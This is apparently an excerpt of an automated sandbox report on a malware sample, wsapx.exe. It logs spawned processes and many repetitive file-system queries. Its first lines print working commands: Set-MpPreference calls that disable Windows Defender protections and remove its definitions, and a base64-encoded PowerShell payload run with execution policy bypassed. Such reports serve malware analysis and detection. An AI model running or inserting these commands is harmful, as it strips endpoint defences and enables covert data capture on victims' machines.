Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab

Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe

Code function: 110_2_00007FF60E60B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

110_2_00007FF60E60B340

Source: C:\Users\user\Desktop\wsapx.exe

Code function: 0_2_00007FF7C71D95E0 cpuid

0_2_00007FF7C71D95E0

Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\_lzma.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\select.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Queries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformation	Jump to behavior
